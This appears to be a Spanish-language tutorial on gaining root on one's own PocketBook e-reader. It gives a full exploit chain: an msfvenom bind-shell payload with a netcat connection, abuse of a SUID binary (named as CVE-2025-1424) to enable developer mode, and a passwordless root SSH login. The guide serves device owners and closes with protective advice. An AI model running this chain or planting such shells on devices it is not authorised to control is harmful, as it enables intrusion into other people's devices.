Conectarse vía SSH como root a un PocketBook (InkPad Color 3, Verse Pro Color, etc)
Última actualización: 1 de Agosto del 2025
Introducción
Si eres dueño de un PocketBook InkPad Color 3, Verse Pro Color u otros modelos similares, es posible que desees tener control total sobre tu dispositivo. Gracias a un análisis de seguridad reciente, se descubrieron vulnerabilidades que permiten escalar privilegios y obtener acceso root en el dispositivo.
En esta guía, te explicaremos paso a paso cómo aprovechar estas vulnerabilidades para activar el modo desarrollador, habilitar SSH y ganar acceso completo a tu e-reader.
Requisitos Previos
Dispositivo PocketBook (InkPad Color 3, Verse Pro Color, u otros modelos afectados). Conexión USB y acceso físico al dispositivo. Ordenador con Linux (o WSL en Windows). Conocimientos básicos de la terminal.
Paso 1: Obtener un Shell Básico
Primero, necesitamos ejecutar comandos en el dispositivo. Para ello:- Conecta el PocketBook a tu PC y selecciona "PC LINK" en el menú.
- Crea un binario de bind shell (un acceso remoto) usando msfvenom:
Bash:msfvenom -p linux/armle/shell_bind_tcp LPORT=1337 -f elf -o bind.app - Copia bind.app en la carpeta de aplicaciones del PocketBook.
- Ejecuta la aplicación desde el menú del e-reader.
- Conéctate al shell desde tu PC:
Bash:nc <IP_DEL_POCKETBOOK> 1337 - Verifica que tienes acceso con:
Bash:id
Deberías ver:
Bash:uid=101(reader) gid=101(reader) groups=3003
Paso 2: Escalada de Privilegios (CVE-2025-1424)
El dispositivo tiene un binario SUID (iv2sh) que permite escribir archivos como el usuario sreader, lo que nos permite activar el modo desarrollador.- Crea el archivo developer_mode en /mnt/secure/:
Bash:sh -c '/usr/cramfs/bin/iv2sh WriteConfig /mnt/secure/developer_mode privesc 1' - Reinicia el dispositivo para aplicar los cambios.
Paso 3: Acceso Root vía SSH (Modo Desarrollador)
Al reiniciar, el PocketBook configurará una interfaz USB con SSH:- Verifica la IP asignada en tu PC:
Busca la interfaz usb0 con una IP como 192.168.205.2.Bash:ip a
- Conéctate por SSH como root:
(No se requiere contraseña).Bash:ssh -o HostKeyAlgorithms=ssh-rsa [email protected]
¡Ahora tienes acceso root en tu PocketBook!
Posibles Usos Avanzados
✔ Instalar aplicaciones personalizadas.✔ Modificar configuraciones del sistema.
✔ Hacer backup completo del firmware y la configuración.
✔ Descubrir opciones ocultas.
✔ Ejecutar scripts personalizados.
Advertencias y Consideraciones
Esto podría anular la garantía del dispositivo. Si no tienes cuidado, puedes dañar el sistema modificando o eliminando archivos críticos.
¿Cómo Proteger tu PocketBook?
Si no quieres que alguien más explote esta vulnerabilidad:
No permitas acceso físico no autorizado. No copies aplicaciones desconocidas en el dispositivo. Configura una contraseña de bloqueo (si el firmware lo permite).Todo esto es posible gracias a que el PocketBook al iniciarse tiene un fichero que define la configuración del USB y dentro de este indica que si existe el archivo en
/mnt/secure/developer_mode entonces creará una red con la que podrás conectarte al Ebook Reader.
Última edición:
